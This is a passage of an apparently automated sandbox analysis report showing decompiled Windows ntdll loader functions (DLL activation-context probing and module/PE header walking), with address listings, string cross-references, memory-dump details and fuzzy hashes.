								_t35 = _v12;
							}
							 *((intOrPtr*)(_t48 + 0x48)) = _t35;
						}
						goto L9;
					}
					if(_t49 != 0xc000008a) {
						if(_t49 != 0xc000008b && _t49 != 0xc0000089 && _t49 != 0xc000000f && _t49 != 0xc0000204 && _t49 != 0xc0000002) {
							if(_t49 != 0xc00000bb) {
								goto L8;
							}
						}
					}
					if(( *0x1e495780 & 0x00000005) != 0) {
						_push(_t49);
						E1E425510("minkernel\\ntdll\\ldrsnap.c", 0x298, "LdrpFindDllActivationContext", 2, "Probing for the manifest of DLL \"%wZ\" failed with status 0x%08lx\n", _t48 + 0x24);
						_t53 = _t53 + 0x1c;
					}
					_t49 = 0;
					goto L8;
				} else {
					goto L9;
				}
			}




















                                        0x1e3d8e0f
                                        0x1e3d8e16
                                        0x1e3d8e19
                                        0x1e3d8e1b
                                        0x1e3d8e21
                                        0x1e3d8e7f
                                        0x1e3d8e85
                                        0x1e419354
                                        0x1e41936c
                                        0x1e419371
                                        0x1e41937b
                                        0x1e419381
                                        0x1e419381
                                        0x1e41937b
                                        0x1e3d8e9d
                                        0x1e3d8e9d
                                        0x1e3d8e29
                                        0x1e3d8e2c
                                        0x1e3d8e38
                                        0x1e3d8e3e
                                        0x1e3d8e43
                                        0x1e3d8eb5
                                        0x1e3d8eb9
                                        0x1e4192a8
                                        0x1e4192aa
                                        0x1e4192af
                                        0x1e4192e8
                                        0x1e4192e8
                                        0x1e4192af
                                        0x1e3d8eb9
                                        0x1e3d8e45
                                        0x1e3d8e53
                                        0x1e3d8e5b
                                        0x1e3d8e5f
                                        0x1e3d8e78
                                        0x1e3d8e78
                                        0x1e3d8e7d
                                        0x1e3d8ec3
                                        0x1e3d8ecd
                                        0x1e3d8ed2
                                        0x1e3d8ed2
                                        0x1e3d8ec5
                                        0x1e3d8ec5
                                        0x00000000
                                        0x1e3d8e7d
                                        0x1e3d8e67
                                        0x1e3d8ea4
                                        0x1e41931a
                                        0x00000000
                                        0x00000000
                                        0x1e419320
                                        0x1e3d8ea4
                                        0x1e3d8e70
                                        0x1e419325
                                        0x1e419340
                                        0x1e419345
                                        0x1e419345
                                        0x1e3d8e76
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000

                                        APIs
                                        Strings
                                        • Querying the active activation context failed with status 0x%08lx, xrefs: 1E419357
                                        • minkernel\ntdll\ldrsnap.c, xrefs: 1E41933B, 1E419367
                                        • LdrpFindDllActivationContext, xrefs: 1E419331, 1E41935D
                                        • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 1E41932A
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.316333777.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true
                                        • Associated: 00000001.00000002.316536328.000000001E49B000.00000040.00000001.sdmp Download File
                                        • Associated: 00000001.00000002.316544263.000000001E49F000.00000040.00000001.sdmp Download File
                                        Similarity
                                        • API ID: DebugPrintTimes
                                        • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                        • API String ID: 3446177414-3779518884
                                        • Opcode ID: e3ae310800b2d119b1e4e1a7cc4c1b3997d21246b596edcaa751ef5fc2424314
                                        • Instruction ID: e0526d5ec8df3a5b9409c9e9e0638c28807f8fa09bbff3364ffb9be08153f0c8
                                        • Opcode Fuzzy Hash: e3ae310800b2d119b1e4e1a7cc4c1b3997d21246b596edcaa751ef5fc2424314
                                        • Instruction Fuzzy Hash: 4C414A33D003569FDB14AB19CC98A69F2BEBB84204F86476AE90D67150E770FD888FD1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 1E3BD5E0, Relevance: 1.9, APIs: 1, Instructions: 353timeCOMMONCrypto
                                        Download Yara Rule
                                        C-Code - Quality: 87%
                                        			E1E3BD5E0(signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16, signed int _a20, signed int _a24) {
				signed int _v8;
				intOrPtr _v20;
				signed int _v36;
				intOrPtr* _v40;
				signed int _v44;
				signed int _v48;
				signed char _v52;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				intOrPtr _v80;
				signed int _v84;
				intOrPtr _v100;
				intOrPtr _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				intOrPtr _v120;
				signed int _v132;
				char _v140;
				char _v144;
				char _v157;
				signed int _v164;
				signed int _v168;
				signed int _v169;
				intOrPtr _v176;
				signed int _v180;
				intOrPtr _v184;
				intOrPtr _v188;
				signed int _v192;
				signed int _v200;
				signed int _v208;
				intOrPtr* _v212;
				char _v216;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t204;
				signed int _t206;
				void* _t208;
				signed int _t211;
				signed int _t216;
				intOrPtr _t217;
				intOrPtr* _t218;
				signed int _t226;
				signed int _t239;
				signed int* _t247;
				signed int _t249;
				void* _t252;
				signed int _t256;
				signed int _t269;
				signed int _t271;
				signed int _t277;
				intOrPtr _t279;
				intOrPtr _t283;
				signed int _t287;
				signed int _t288;
				void* _t289;
				signed char _t290;
				signed int _t292;
				signed int* _t293;
				unsigned int _t297;
				signed int _t306;
				signed int _t307;
				signed int _t308;
				signed int _t309;
				signed int _t310;
				intOrPtr _t311;
				intOrPtr _t312;
				signed int _t319;
				intOrPtr _t320;
				signed int* _t324;
				signed int _t337;
				signed int _t338;
				signed int _t339;
				intOrPtr* _t340;
				void* _t341;
				signed int _t344;
				signed int _t348;
				signed int _t349;
				signed int _t351;
				intOrPtr _t353;
				void* _t354;
				signed int _t356;
				signed int _t358;
				intOrPtr _t359;
				signed int _t361;
				signed int _t363;
				signed short* _t365;
				void* _t367;
				intOrPtr _t369;
				void* _t370;
				signed int _t371;
				signed int _t372;
				void* _t374;
				signed int _t376;
				void* _t384;
				signed int _t387;

				_v8 =  *0x1e49d360 ^ _t376;
				_t2 =  &_a20;
				 *_t2 = _a20 & 0x00000001;
				_t287 = _a4;
				_v200 = _a12;
				_t365 = _a8;
				_v212 = _a16;
				_v180 = _a24;
				_v168 = 0;
				_v157 = 0;
				if( *_t2 != 0) {
					__eflags = E1E3B6600(0x1e4952d8);
					if(__eflags == 0) {
						goto L1;
					} else {
						_v188 = 6;
					}
				} else {
					L1:
					_v188 = 9;
				}
				if(_t365 == 0) {
					_v164 = 0;
					goto L5;
				} else {
					_t363 =  *_t365 & 0x0000ffff;
					_t341 = _t363 + 1;
					if((_t365[1] & 0x0000ffff) < _t341) {
						L109:
						__eflags = _t341 - 0x80;
						if(_t341 <= 0x80) {
							_t281 =  &_v140;
							_v164 =  &_v140;
							goto L114;
						} else {
							_t283 =  *0x1e497b9c; // 0x0
							_t281 = L1E3C4620(_t341,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t283 + 0x180000, _t341);
							_v164 = _t281;
							__eflags = _t281;
							if(_t281 != 0) {
								_v157 = 1;
								L114:
								E1E3EF3E0(_t281, _t365[2], _t363);
								_t200 = _v164;
								 *((char*)(_v164 + _t363)) = 0;
								goto L5;
							} else {
								_t204 = 0xc000009a;
								goto L47;
							}
						}
					} else {
						_t200 = _t365[2];
						_v164 = _t200;
						if( *((char*)(_t200 + _t363)) != 0) {
							goto L109;
						} else {
							while(1) {
								L5:
								_t353 = 0;
								_t342 = 0x1000;
								_v176 = 0;
								if(_t287 == 0) {
									break;
								}
								_t384 = _t287 -  *0x1e497b90; // 0x77df0000
								if(_t384 == 0) {
									_t353 =  *0x1e497b8c; // 0x942ac8
									_v176 = _t353;
									_t63 = _t353 + 0x50; // 0x942b78
									_t64 =  *_t63 + 0x20; // 0x9
									_t320 =  *_t64;
									_v184 = _t320;
								} else {
									E1E3C2280(_t200, 0x1e4984d8);
									_t277 =  *0x1e4985f4; // 0x9440f0
									_t351 =  *0x1e4985f8 & 1;
									while(_t277 != 0) {
										_t21 = _t277 - 0x50; // 0x75080000
										_t337 =  *_t21;
										if(_t337 > _t287) {
											_t338 = _t337 | 0xffffffff;
										} else {
											asm("sbb ecx, ecx");
											_t338 =  ~_t337;
										}
										_t387 = _t338;
										if(_t387 < 0) {
											_t339 =  *_t277;
											__eflags = _t351;
											if(_t351 != 0) {
												__eflags = _t339;
												if(_t339 == 0) {
													goto L16;
												} else {
													goto L118;
												}
												goto L151;
											} else {
												goto L16;
											}
											goto L17;
										} else {
											if(_t387 <= 0) {
												__eflags = _t277;
												if(_t277 != 0) {
													_t23 = _t277 - 0x18; // 0x942ef8
													_t340 =  *_t23;
													_t24 = _t277 - 0x68; // 0x944088
													_t353 = _t24;
													_v176 = _t353;
													__eflags =  *((intOrPtr*)(_t340 + 0xc)) - 0xffffffff;
													if( *((intOrPtr*)(_t340 + 0xc)) != 0xffffffff) {
														_t279 =  *_t340;
														__eflags =  *(_t279 - 0x20) & 0x00000020;
														if(( *(_t279 - 0x20) & 0x00000020) == 0) {
															asm("lock inc dword [edi+0x9c]");
															_t30 = _t353 + 0x50; // 0x942ef8
															_t340 =  *_t30;
														}
													}
													_t31 = _t340 + 0x20; // 0x9
													_v184 =  *_t31;
												}
											} else {
												_t22 = _t277 + 4; // 0x943ce8
												_t339 =  *_t22;
												if(_t351 != 0) {
													__eflags = _t339;
													if(_t339 == 0) {
														goto L16;
													} else {
														L118:
														_t277 = _t277 ^ _t339;
														goto L17;
													}
													goto L151;
												} else {
													L16:
													_t277 = _t339;
												}
												goto L17;
											}
										}
										goto L25;
										L17:
									}
									L25:
									E1E3BFFB0(_t287, _t353, 0x1e4984d8);
									_t320 = _v184;
									_t342 = 0x1000;
								}
								if(_t353 == 0) {
									break;
								} else {
									_t366 = 0;
									if(( *( *[fs:0x18] + 0xfca) & _t342) != 0 || _t320 >= _v188) {
										_t288 = _v164;
										if(_t353 != 0) {
											_t342 = _t288;
											_t374 = E1E3FCC99(_t353, _t288, _v200, "true",  &_v168);
											if(_t374 >= 0) {
												if(_v184 == 7) {
													__eflags = _a20;
													if(__eflags == 0) {
														__eflags =  *( *[fs:0x18] + 0xfca) & 0x00001000;
														if(__eflags != 0) {
															_t271 = E1E3B6600(0x1e4952d8);
															__eflags = _t271;
															if(__eflags == 0) {
																_t342 = 0;
																_v169 = _t271;
																_t374 = E1E3B7926( *(_t353 + 0x50), 0,  &_v169);
															}
														}
													}
												}
												if(_t374 < 0) {
													_v168 = 0;
												} else {
													if( *0x1e49b239 != 0) {
														_t342 =  *(_t353 + 0x18);
														E1E42E974(_v180,  *(_t353 + 0x18), __eflags, _v168, 0,  &_v168);
													}
													if( *0x1e498472 != 0) {
														_v192 = 0;
														_t342 =  *0x7ffe0330;
														_t361 =  *0x1e49b218; // 0x0
														asm("ror edi, cl");
														 *0x1e49b1e0( &_v192, _t353, _v168, 0, _v180);
														 *(_t361 ^  *0x7ffe0330)();
														_t269 = _v192;
														_t353 = _v176;
														__eflags = _t269;
														if(__eflags != 0) {
															_v168 = _t269;
														}
													}
												}
											}
											if(_t374 == 0xc0000135 || _t374 == 0xc0000142) {
												_t366 = 0xc000007a;
											}
											_t247 =  *(_t353 + 0x50);
											if(_t247[3] == 0xffffffff) {
												L40:
												if(_t366 == 0xc000007a) {
													__eflags = _t288;
													if(_t288 == 0) {
														goto L136;
													} else {
														_t366 = 0xc0000139;
													}
													goto L54;
												}
											} else {
												_t249 =  *_t247;
												if(( *(_t249 - 0x20) & 0x00000020) != 0) {
													goto L40;
												} else {
													_t250 = _t249 | 0xffffffff;
													asm("lock xadd [edi+0x9c], eax");
													if((_t249 | 0xffffffff) == 0) {
														E1E3C2280(_t250, 0x1e4984d8);
														_t342 =  *(_t353 + 0x54);
														_t165 = _t353 + 0x54; // 0x54
														_t252 = _t165;
														__eflags =  *(_t342 + 4) - _t252;
														if( *(_t342 + 4) != _t252) {
															L135:
															asm("int 0x29");
															L136:
															_t288 = _v200;
															_t366 = 0xc0000138;
															L54:
															_t342 = _t288;
															L1E3E3898(0, _t288, _t366);
														} else {
															_t324 =  *(_t252 + 4);
															__eflags =  *_t324 - _t252;
															if( *_t324 != _t252) {
																goto L135;
															} else {
																 *_t324 = _t342;
																 *(_t342 + 4) = _t324;
																_t293 =  *(_t353 + 0x50);
																_v180 =  *_t293;
																E1E3BFFB0(_t293, _t353, 0x1e4984d8);
																__eflags =  *((short*)(_t353 + 0x3a));
																if( *((short*)(_t353 + 0x3a)) != 0) {
																	_t342 = 0;
																	__eflags = 0;
																	E1E3E37F5(_t353, 0);
																}
																E1E3E0413(_t353);
																_t256 =  *(_t353 + 0x48);
																__eflags = _t256;
																if(_t256 != 0) {
																	__eflags = _t256 - 0xffffffff;
																	if(_t256 != 0xffffffff) {
																		E1E3D9B10(_t256);
																	}
																}
																__eflags =  *(_t353 + 0x28);
																if( *(_t353 + 0x28) != 0) {
																	_t174 = _t353 + 0x24; // 0x24
																	E1E3D02D6(_t174);
																}
																L1E3C77F0( *0x1e497b98, 0, _t353);
																__eflags = _v180 - _t293;
																if(__eflags == 0) {
																	E1E3DC277(_t293, _t366);
																}
																_t288 = _v164;
																goto L40;
															}
														}
													} else {
														goto L40;
													}
												}
											}
										}
									} else {
										L1E3BEC7F(_t353);
										L1E3D19B8(_t287, 0, _t353, 0);
										_t200 = E1E3AF4E3(__eflags);
										continue;
									}
								}
								L41:
								if(_v157 != 0) {
									L1E3C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t288);
								}
								if(_t366 < 0) {
									L46:
									 *_v212 = _v168;
									_t204 = _t366;
									L47:
									_pop(_t354);
									_pop(_t367);
									_pop(_t289);
									return E1E3EB640(_t204, _t289, _v8 ^ _t376, _t342, _t354, _t367);
								} else {
									_t206 =  *0x1e49b2f8; // 0x0
									if((_t206 |  *0x1e49b2fc) == 0 || ( *0x1e49b2e4 & 0x00000001) != 0) {
										goto L46;
									} else {
										_t297 =  *0x1e49b2ec; // 0x0
										_v200 = 0;
										if((_t297 >> 0x00000008 & 0x00000003) == 3) {
											_t355 = _v168;
											_t342 =  &_v208;
											_t208 = E1E456B68(_v168,  &_v208, _v168, __eflags);
											__eflags = _t208 - 1;
											if(_t208 == 1) {
												goto L46;
											} else {
												__eflags = _v208 & 0x00000010;
												if((_v208 & 0x00000010) == 0) {
													goto L46;
												} else {
													_t342 = 4;
													_t366 = E1E456AEB(_t355, 4,  &_v216);
													__eflags = _t366;
													if(_t366 >= 0) {
														goto L46;
													} else {
														asm("int 0x29");
														_t356 = 0;
														_v44 = 0;
														_t290 = _v52;
														__eflags = 0;
														if(0 == 0) {
															L108:
															_t356 = 0;
															_v44 = 0;
															goto L63;
														} else {
															__eflags = 0;
															if(0 < 0) {
																goto L108;
															}
															L63:
															_v112 = _t356;
															__eflags = _t356;
															if(_t356 == 0) {
																L143:
																_v8 = 0xfffffffe;
																_t211 = 0xc0000089;
															} else {
																_v36 = 0;
																_v60 = 0;
																_v48 = 0;
																_v68 = 0;
																_v44 = _t290 & 0xfffffffc;
																E1E3BE9C0(1, _t290 & 0xfffffffc, 0, 0,  &_v68);
																_t306 = _v68;
																__eflags = _t306;
																if(_t306 == 0) {
																	_t216 = 0xc000007b;
																	_v36 = 0xc000007b;
																	_t307 = _v60;
																} else {
																	__eflags = _t290 & 0x00000001;
																	if(__eflags == 0) {
																		_t349 =  *(_t306 + 0x18) & 0x0000ffff;
																		__eflags = _t349 - 0x10b;
																		if(_t349 != 0x10b) {
																			__eflags = _t349 - 0x20b;
																			if(_t349 == 0x20b) {
																				goto L102;
																			} else {
																				_t307 = 0;
																				_v48 = 0;
																				_t216 = 0xc000007b;
																				_v36 = 0xc000007b;
																				goto L71;
																			}
																		} else {
																			L102:
																			_t307 =  *(_t306 + 0x50);
																			goto L69;
																		}
																		goto L151;
																	} else {
																		_t239 = L1E3BEAEA(_t290, _t290, _t356, _t366, __eflags);
																		_t307 = _t239;
																		_v60 = _t307;
																		_v48 = _t307;
																		__eflags = _t307;
																		if(_t307 != 0) {
																			L70:
																			_t216 = _v36;
																		} else {
																			_push(_t239);
																			_push(0x14);
																			_push( &_v144);
																			_push(3);
																			_push(_v44);
																			_push(0xffffffff);
																			_t319 = E1E3E9730();
																			_v36 = _t319;
																			__eflags = _t319;
																			if(_t319 < 0) {
																				_t216 = 0xc000001f;
																				_v36 = 0xc000001f;
																				_t307 = _v60;
																			} else {
																				_t307 = _v132;
																				L69:
																				_v48 = _t307;
																				goto L70;
																			}
																		}
																	}
																}
																L71:
																_v72 = _t307;
																_v84 = _t216;
																__eflags = _t216 - 0xc000007b;
																if(_t216 == 0xc000007b) {
																	L150:
																	_v8 = 0xfffffffe;
																	_t211 = 0xc000007b;
																} else {
																	_t344 = _t290 & 0xfffffffc;
																	_v76 = _t344;
																	__eflags = _v40 - _t344;
																	if(_v40 <= _t344) {
																		goto L150;
																	} else {
																		__eflags = _t307;
																		if(_t307 == 0) {
																			L75:
																			_t217 = 0;
																			_v104 = 0;
																			__eflags = _t366;
																			if(_t366 != 0) {
																				__eflags = _t290 & 0x00000001;
																				if((_t290 & 0x00000001) != 0) {
																					_t217 = 1;
																					_v104 = 1;
																				}
																				_t290 = _v44;
																				_v52 = _t290;
																			}
																			__eflags = _t217 - 1;
																			if(_t217 != 1) {
																				_t369 = 0;
																				_t218 = _v40;
																				goto L91;
																			} else {
																				_v64 = 0;
																				E1E3BE9C0(1, _t290, 0, 0,  &_v64);
																				_t309 = _v64;
																				_v108 = _t309;
																				__eflags = _t309;
																				if(_t309 == 0) {
																					goto L143;
																				} else {
																					_t226 =  *(_t309 + 0x18) & 0x0000ffff;
																					__eflags = _t226 - 0x10b;
																					if(_t226 != 0x10b) {
																						__eflags = _t226 - 0x20b;
																						if(_t226 != 0x20b) {
																							goto L143;
																						} else {
																							_t371 =  *(_t309 + 0x98);
																							goto L83;
																						}
																					} else {
																						_t371 =  *(_t309 + 0x88);
																						L83:
																						__eflags = _t371;
																						if(_t371 != 0) {
																							_v80 = _t371 - _t356 + _t290;
																							_t310 = _v64;
																							_t348 = _t310 + 0x18 + ( *(_t309 + 0x14) & 0x0000ffff);
																							_t292 =  *(_t310 + 6) & 0x0000ffff;
																							_t311 = 0;
																							__eflags = 0;
																							while(1) {
																								_v120 = _t311;
																								_v116 = _t348;
																								__eflags = _t311 - _t292;
																								if(_t311 >= _t292) {
																									goto L143;
																								}
																								_t359 =  *((intOrPtr*)(_t348 + 0xc));
																								__eflags = _t371 - _t359;
																								if(_t371 < _t359) {
																									L98:
																									_t348 = _t348 + 0x28;
																									_t311 = _t311 + 1;
																									continue;
																								} else {
																									__eflags = _t371 -  *((intOrPtr*)(_t348 + 0x10)) + _t359;
																									if(_t371 >=  *((intOrPtr*)(_t348 + 0x10)) + _t359) {
																										goto L98;
																									} else {
																										__eflags = _t348;
																										if(_t348 == 0) {
																											goto L143;
																										} else {
																											_t218 = _v40;
																											_t312 =  *_t218;
																											__eflags = _t312 -  *((intOrPtr*)(_t348 + 8));
																											if(_t312 >  *((intOrPtr*)(_t348 + 8))) {
																												_v100 = _t359;
																												_t360 = _v108;
																												_t372 = L1E3B8F44(_v108, _t312);
																												__eflags = _t372;
																												if(_t372 == 0) {
																													goto L143;
																												} else {
																													_t290 = _v52;
																													_t369 = _v80 +  *((intOrPtr*)(_t372 + 0xc)) - _v100 + _v112 - E1E3E3C00(_t360, _t290,  *((intOrPtr*)(_t372 + 0xc)));
																													_t307 = _v72;
																													_t344 = _v76;
																													_t218 = _v40;
																													goto L91;
																												}
																											} else {
																												_t290 = _v52;
																												_t307 = _v72;
																												_t344 = _v76;
																												_t369 = _v80;
																												L91:
																												_t358 = _a4;
																												__eflags = _t358;
																												if(_t358 == 0) {
																													L95:
																													_t308 = _a8;
																													__eflags = _t308;
																													if(_t308 != 0) {
																														 *_t308 =  *((intOrPtr*)(_v40 + 4));
																													}
																													_v8 = 0xfffffffe;
																													_t211 = _v84;
																												} else {
																													_t370 =  *_t218 - _t369 + _t290;
																													 *_t358 = _t370;
																													__eflags = _t370 - _t344;
																													if(_t370 <= _t344) {
																														L149:
																														 *_t358 = 0;
																														goto L150;
																													} else {
																														__eflags = _t307;
																														if(_t307 == 0) {
																															goto L95;
																														} else {
																															__eflags = _t370 - _t344 + _t307;
																															if(_t370 >= _t344 + _t307) {
																																goto L149;
																															} else {
																																goto L95;
																															}
																														}
																													}
																												}
																											}
																										}
																									}
																								}
																								goto L97;
																							}
																						}
																						goto L143;
																					}
																				}
																			}
																		} else {
																			__eflags = _v40 - _t307 + _t344;
																			if(_v40 >= _t307 + _t344) {
																				goto L150;
																			} else {
																				goto L75;
																			}
																		}
																	}
																}
															}
															L97:
															 *[fs:0x0] = _v20;
															return _t211;
														}
													}
												}
											}
										} else {
											goto L46;
										}
									}
								}
								goto L151;
							}
							_t288 = _v164;
							_t366 = 0xc0000135;
							goto L41;
						}
					}
				}
				L151:
			}








































































































                                        0x1e3bd5f2
                                        0x1e3bd5f5
                                        0x1e3bd5f5
                                        0x1e3bd5fd
                                        0x1e3bd600
                                        0x1e3bd60a
                                        0x1e3bd60d
                                        0x1e3bd617
                                        0x1e3bd61d
                                        0x1e3bd627
                                        0x1e3bd62e
                                        0x1e3bd911
                                        0x1e3bd913
                                        0x00000000
                                        0x1e3bd919
                                        0x1e3bd919
                                        0x1e3bd919
                                        0x1e3bd634
                                        0x1e3bd634
                                        0x1e3bd634
                                        0x1e3bd634
                                        0x1e3bd640
                                        0x1e3bd8bf
                                        0x00000000
                                        0x1e3bd646
                                        0x1e3bd646
                                        0x1e3bd64d
                                        0x1e3bd652
                                        0x1e40b2fc
                                        0x1e40b2fc
                                        0x1e40b302
                                        0x1e40b33b
                                        0x1e40b341
                                        0x00000000
                                        0x1e40b304
                                        0x1e40b304
                                        0x1e40b319
                                        0x1e40b31e
                                        0x1e40b324
                                        0x1e40b326
                                        0x1e40b332
                                        0x1e40b347
                                        0x1e40b34c
                                        0x1e40b351
                                        0x1e40b35a
                                        0x00000000
                                        0x1e40b328
                                        0x1e40b328
                                        0x00000000
                                        0x1e40b328
                                        0x1e40b326
                                        0x1e3bd658
                                        0x1e3bd658
                                        0x1e3bd65b
                                        0x1e3bd665
                                        0x00000000
                                        0x1e3bd66b
                                        0x1e3bd66b
                                        0x1e3bd66b
                                        0x1e3bd66b
                                        0x1e3bd66d
                                        0x1e3bd672
                                        0x1e3bd67a
                                        0x00000000
                                        0x00000000
                                        0x1e3bd680
                                        0x1e3bd686
                                        0x1e3bd8ce
                                        0x1e3bd8d4
                                        0x1e3bd8da
                                        0x1e3bd8dd
                                        0x1e3bd8dd
                                        0x1e3bd8e0
                                        0x1e3bd68c
                                        0x1e3bd691
                                        0x1e3bd69d
                                        0x1e3bd6a2
                                        0x1e3bd6a7
                                        0x1e3bd6b0
                                        0x1e3bd6b0
                                        0x1e3bd6b5
                                        0x1e3bd6e0
                                        0x1e3bd6b7
                                        0x1e3bd6b7
                                        0x1e3bd6b9
                                        0x1e3bd6b9
                                        0x1e3bd6bb
                                        0x1e3bd6bd
                                        0x1e3bd6ce
                                        0x1e3bd6d0
                                        0x1e3bd6d2
                                        0x1e40b363
                                        0x1e40b365
                                        0x00000000
                                        0x1e40b36b
                                        0x00000000
                                        0x1e40b36b
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x1e3bd6bf
                                        0x1e3bd6bf
                                        0x1e3bd6e5
                                        0x1e3bd6e7
                                        0x1e3bd6e9
                                        0x1e3bd6e9
                                        0x1e3bd6ec
                                        0x1e3bd6ec
                                        0x1e3bd6ef
                                        0x1e3bd6f5
                                        0x1e3bd6f9
                                        0x1e3bd6fb
                                        0x1e3bd6fd
                                        0x1e3bd701
                                        0x1e3bd703
                                        0x1e3bd70a
                                        0x1e3bd70a
                                        0x1e3bd70a
                                        0x1e3bd701
                                        0x1e3bd70d
                                        0x1e3bd710
                                        0x1e3bd710
                                        0x1e3bd6c1
                                        0x1e3bd6c1
                                        0x1e3bd6c1
                                        0x1e3bd6c6
                                        0x1e40b36d
                                        0x1e40b36f
                                        0x00000000
                                        0x1e40b375
                                        0x1e40b375
                                        0x1e40b375
                                        0x00000000
                                        0x1e40b375
                                        0x00000000
                                        0x1e3bd6cc
                                        0x1e3bd6d8
                                        0x1e3bd6d8
                                        0x1e3bd6d8
                                        0x00000000
                                        0x1e3bd6c6
                                        0x1e3bd6bf
                                        0x00000000
                                        0x1e3bd6da
                                        0x1e3bd6da
                                        0x1e3bd716
                                        0x1e3bd71b
                                        0x1e3bd720
                                        0x1e3bd726
                                        0x1e3bd726
                                        0x1e3bd72d
                                        0x00000000
                                        0x1e3bd733
                                        0x1e3bd739
                                        0x1e3bd742
                                        0x1e3bd750
                                        0x1e3bd758
                                        0x1e3bd764
                                        0x1e3bd776
                                        0x1e3bd77a
                                        0x1e3bd783
                                        0x1e3bd928
                                        0x1e3bd92c
                                        0x1e3bd93d
                                        0x1e3bd944
                                        0x1e3bd94f
                                        0x1e3bd954
                                        0x1e3bd956
                                        0x1e3bd95f
                                        0x1e3bd961
                                        0x1e3bd973
                                        0x1e3bd973
                                        0x1e3bd956
                                        0x1e3bd944
                                        0x1e3bd92c
                                        0x1e3bd78b
                                        0x1e40b394
                                        0x1e3bd791
                                        0x1e3bd798
                                        0x1e40b3a3
                                        0x1e40b3bb
                                        0x1e40b3bb
                                        0x1e3bd7a5
                                        0x1e3bd866
                                        0x1e3bd870
                                        0x1e3bd884
                                        0x1e3bd892
                                        0x1e3bd898
                                        0x1e3bd89e
                                        0x1e3bd8a0
                                        0x1e3bd8a6
                                        0x1e3bd8ac
                                        0x1e3bd8ae
                                        0x1e3bd8b4
                                        0x1e3bd8b4
                                        0x1e3bd8ae
                                        0x1e3bd7a5
                                        0x1e3bd78b
                                        0x1e3bd7b1
                                        0x1e40b3c5
                                        0x1e40b3c5
                                        0x1e3bd7c3
                                        0x1e3bd7ca
                                        0x1e3bd7e5
                                        0x1e3bd7eb
                                        0x1e3bd8eb
                                        0x1e3bd8ed
                                        0x00000000
                                        0x1e3bd8f3
                                        0x1e3bd8f3
                                        0x1e3bd8f3
                                        0x00000000
                                        0x1e3bd8ed
                                        0x1e3bd7cc
                                        0x1e3bd7cc
                                        0x1e3bd7d2
                                        0x00000000
                                        0x1e3bd7d4
                                        0x1e3bd7d4
                                        0x1e3bd7d7
                                        0x1e3bd7df
                                        0x1e40b3d4
                                        0x1e40b3d9
                                        0x1e40b3dc
                                        0x1e40b3dc
                                        0x1e40b3df
                                        0x1e40b3e2
                                        0x1e40b468
                                        0x1e40b46d
                                        0x1e40b46f
                                        0x1e40b46f
                                        0x1e40b475
                                        0x1e3bd8f8
                                        0x1e3bd8f9
                                        0x1e3bd8fd
                                        0x1e40b3e8
                                        0x1e40b3e8
                                        0x1e40b3eb
                                        0x1e40b3ed
                                        0x00000000
                                        0x1e40b3ef
                                        0x1e40b3ef
                                        0x1e40b3f1
                                        0x1e40b3f4
                                        0x1e40b3fe
                                        0x1e40b404
                                        0x1e40b409
                                        0x1e40b40e
                                        0x1e40b410
                                        0x1e40b410
                                        0x1e40b414
                                        0x1e40b414
                                        0x1e40b41b
                                        0x1e40b420
                                        0x1e40b423
                                        0x1e40b425
                                        0x1e40b427
                                        0x1e40b42a
                                        0x1e40b42d
                                        0x1e40b42d
                                        0x1e40b42a
                                        0x1e40b432
                                        0x1e40b436
                                        0x1e40b438
                                        0x1e40b43b
                                        0x1e40b43b
                                        0x1e40b449
                                        0x1e40b44e
                                        0x1e40b454
                                        0x1e40b458
                                        0x1e40b458
                                        0x1e40b45d
                                        0x00000000
                                        0x1e40b45d
                                        0x1e40b3ed
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x1e3bd7df
                                        0x1e3bd7d2
                                        0x1e3bd7ca
                                        0x1e40b37c
                                        0x1e40b37e
                                        0x1e40b385
                                        0x1e40b38a
                                        0x00000000
                                        0x1e40b38a
                                        0x1e3bd742
                                        0x1e3bd7f1
                                        0x1e3bd7f8
                                        0x1e40b49b
                                        0x1e40b49b
                                        0x1e3bd800
                                        0x1e3bd837
                                        0x1e3bd843
                                        0x1e3bd845
                                        0x1e3bd847
                                        0x1e3bd84a
                                        0x1e3bd84b
                                        0x1e3bd84e
                                        0x1e3bd857
                                        0x1e3bd802
                                        0x1e3bd802
                                        0x1e3bd80d
                                        0x00000000
                                        0x1e3bd818
                                        0x1e3bd818
                                        0x1e3bd824
                                        0x1e3bd831
                                        0x1e40b4a5
                                        0x1e40b4ab
                                        0x1e40b4b3
                                        0x1e40b4b8
                                        0x1e40b4bb
                                        0x00000000
                                        0x1e40b4c1
                                        0x1e40b4c1
                                        0x1e40b4c8
                                        0x00000000
                                        0x1e40b4ce
                                        0x1e40b4d4
                                        0x1e40b4e1
                                        0x1e40b4e3
                                        0x1e40b4e5
                                        0x00000000
                                        0x1e40b4eb
                                        0x1e40b4f0
                                        0x1e40b4f2
                                        0x1e3bdac9
                                        0x1e3bdacc
                                        0x1e3bdacf
                                        0x1e3bdad1
                                        0x1e3bdd78
                                        0x1e3bdd78
                                        0x1e3bdcf2
                                        0x00000000
                                        0x1e3bdad7
                                        0x1e3bdad9
                                        0x1e3bdadb
                                        0x00000000
                                        0x00000000
                                        0x1e3bdae1
                                        0x1e3bdae1
                                        0x1e3bdae4
                                        0x1e3bdae6
                                        0x1e40b4f9
                                        0x1e40b4f9
                                        0x1e40b500
                                        0x1e3bdaec
                                        0x1e3bdaec
                                        0x1e3bdaf5
                                        0x1e3bdaf8
                                        0x1e3bdafb
                                        0x1e3bdb03
                                        0x1e3bdb11
                                        0x1e3bdb16
                                        0x1e3bdb19
                                        0x1e3bdb1b
                                        0x1e40b52c
                                        0x1e40b531
                                        0x1e40b534
                                        0x1e3bdb21
